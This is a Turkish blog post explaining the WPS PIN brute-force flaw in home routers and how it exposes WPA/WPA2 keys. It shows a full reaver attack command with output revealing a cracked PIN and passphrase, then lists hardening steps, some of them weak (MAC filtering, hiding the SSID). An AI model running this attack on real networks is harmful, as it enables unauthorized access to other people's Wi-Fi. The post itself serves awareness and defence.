WPS Destekli Kablosuz Ağların WPA/WPA2 Parolasını Kırmak

Artık birçok kişi Wlan (kablosuz) destekli modemler kullanmaya başladı.  Özellikle ev, iş yeri ve kafeler gibi ortamlarda bu modemlerüzerinden kablosuz cihazlarımızla internete çıkıyoruz. Hele ki evinizde ya da iş yerinizde tablet, cep telefonu gibi kablosuzcihazlar kullanıyorsanız, muhakkak ki tercih edeceğiniz modemlerkablosuz olacaktır.  Fakat bu modemlerin kablosuz şifreleri WPSözellikleri sayesinde kolay bir şekilde kırılabilmekte.

WPS destekli kablosuz modemlerde eskisi kadar güvendedeğiliz! Kablosuz ağlarda geçtiğimiz aylarda tespit edilen WPS açığı sayesinde kablosuz şifreniz ne kadar karmaşık ve uzun olursa olsun birkaç saat hatta birkaç saniye içerisinde kırılarak Wlan ağınıza erişilebiliyor.

WPS Nedir?

Wi-Fi protected Setup olarak isimlendirilen teknoloji, tecrübesiz ve bilgisiz kullanıcıların router ve Wlan destekli modemlerde basit bir şekilde kablosuz ayarları yapmaları için geliştirilmiş bir teknolojidir. Son tüketici modemin bu özelliği sayesinde rahatlıkla kablosuz ayarlarını yapabilmektedir.

Modeminizi ilk kurduğunuzda Wlan ağına bağlanıp modeminizin PIN numarasını (geneldemodemin altındaki etikette yazar) girdiğiniz zaman hiçbir teknik bilgi gerekmeden sadece İLERİ yaparak otomatik ayarlar yapılabilmekte.

Güvenlik Zafiyeti…

İşte güvenlik zafiyeti burada başladı.  WPS yani kolay Wlan kurulumu özelliğine sahipmodemlerin PIN numaraları 8 hanelidir ve bu kod 4′er rakam ile 2 gruba ayrılmaktadır.  4 haneli bir kodun toplamda 10.000 civarında bir olası kombinasyonu vardır. Kısacası özelyazılımlar sayesinde (Wlan modemin PIN numarasını deneme / yanılma ile tespit eden araçlar) rastgele kombinasyon yöntemleri ile birkaç saat içinde tespit edilebiliyor.  Eğer bütün halinde 8 rakam kombinasyonu olsaydı. Bu süreç günlerce deneme yanılma ile devam edebilirdi. Fakat 4 haneli 2 grup olması çok daha basite inmesine sebep olmakta. İlk 4 hane tespit edildikten sonra modem karşı tarafa ilk dört rakamın doğru olduğu onayını alıyor ve diğer 4 rakam için denemeler başlıyor.

Not: Bazı routerlar 3 kere yanlış denemeden sonra karşı tarafın 4. deneme için 60 saniye beklemesini zorunlu kılıyor ve bir süre bloke ediyor.  Bu yüzden bu tarz modemlerinşifrelerinin kırılma süresi günler sürebilir.

Wlan şifrenizin kırılması da PIN kodunuzun bilinmesine bağlı.  Modemin PIN kodu kırıldıktan sonra Wlan sinyalleri snif edilerek şifre ne kadar zor olursa olsun, ne kadar uzun bir şifre olursa olsun birkaç saat hatta birkaç dakika içerisinde kırılabilmekte! İşte zafiyet burada başlıyor.

WPS Özelliğini Kapatmak…

Birçok modem üreticisi varsayılan olarak WPS özelliğini aktif kılıyor. Bazı modemlerde ise WPSözelliği yok. Eğer bu tarz bir modem kullanıyorsanız kafanız biraz daha rahat olabilir. Yine de Wifi şifresini kırmanın diğer birçok yolu olduğunu söylemek isterim. Eğer modeminiz WPSözelliğine sahipse bu özelliği kapatarak bu güvenlik zafiyetinden korunabilirsiniz. WPS Vulnerability Testing dökümanında ise WPS destekli birçok modemin WPS özelliğini nasıl kapatılacağı belirtilmiş.

Tüm router üreticileri, Wi-Fi Alliance tarafından sertifikalandırılmak için WPS’yi varsayılan olarak açık tutuyor. Ancak router’ınız WPS özelliğine sahip olmayabilir. Modeminizin üzerinde bir WPS düğmesi olup olmadığını kontrol edin. Eğer yoksa, cihazınızın arka tarafında 8 haneli bir PIN kodunu olabilir.

Saldırgan…

Saldırgan, WPS’de bulunan güvenlik zaafiyeti ile bu PIN numarasını tahmin ederse WPA/WPA2 anahtarını ele geçirebiliyor. WPA/WPA2 anahtarı ne kadar karmaşık ve uzun olursa olsun, PIN numarası tahmin edildiğinde anahtar elde edilebilir.

Kaynak: Bilgi Güvenliği Akademisi Blog

WPS Anahtarını ele geçirmek…

WPS anahtarını ele geçirmek için saldırgan öncelikle monitör modu destekleyen bir kart ile ağları tarıyor.  Tarama işlemi sonucunda karşısına gelen Wlan ağlarını tespit edip saldırı moduna geçiliyor.   Saldırgan hedef ağın BSSID değerini ve yayın yaptığı kanalları not alarak diğer bir tool ile PIN numarasını Brute Force (rastgele denemeler) atak kullanarak kırmaya başlıyor.

# reaver -i mon0 -b 33:22:55:22:11:2F -c 9 -vv –no-nack -d 5 -f -x298

Reaver v1.4 WiFi Protected Setup Attack Tool
Copyright (c) 2011, Tactical Network Solutions, Craig Heffner <cheffner@tacnetsol.com>

[+] Switching mon0 to channel 9
[+] Waiting for beacon from 33:22:55:22:11:2F
[+] Associated with 33:22:55:22:11:2F (ESSID: rakkoc-zyxel)
[+] Trying pin 47128211
[+] Sending EAPOL START request
[+] Received identity request
[+] Sending identity response
[+] Received M1 message
[+] Sending M2 message
[+] Received M3 message
[+] Sending M4 message
[+] Received M5 message
[+] Sending M6 message
[+] Received M7 message
[+] Sending WSC NACK
[+] Sending WSC NACK
[+] Pin cracked in 9 seconds
[+] WPS PIN: ’47128211′
[+] WPA PSK: ‘$1fr3m112233
[+] AP SSID: ‘rakkoc-zyxel’
[+] Nothing done, nothing to save.

Modemin WPS özelliği kapalıda olsa bile saldırı başarılı olabiliyor. Teorik olarak WPS PIN numarasını tespit etmek maksimum 10 saat sürüyor, pratikte bazı özel durumlarda hedef kablosuz ağa bağlantılar zaman aşımına uğrayabilir ve bu zaman uzayabilir.  Kısacası modem üreticilerini bir kenara bırakırsak bizim yapmamız gerekenler…

  1. WPS özelliğini kapatmak
  2. Mac Filtrelemesi kullanmak
  3. Uzun ve rakam, karakter karışımı şifreler kullanmak
  4. SSID (kablosuz ağ ismi yayınını) yayınını kapatmak

Bu işlemleri yaparsanız biraz daha rahat edebilirsiniz. Yine de unutmamak gerekiyor. WPS özelliği kapalı olsa da, uzuncana karmaşık şifreler kullansanız dahi şifrenizi kırmak onlar için çok da zor değil… Unutmamak gerek, yüzde yüz güvenli bir sistem yoktur. Sadece onları biraz fazla oyalayarak vazgeçmelerini sağlayabilirsiniz. Hele ki yukarıdaki işlemleri yaparsanız en azından Lamer saldırılarından korunmuş olabilirsiniz.

Bir cevap yazın

E-posta hesabınız yayımlanmayacak. Gerekli alanlar * ile işaretlenmişlerdir

This site uses Akismet to reduce spam. Learn how your comment data is processed.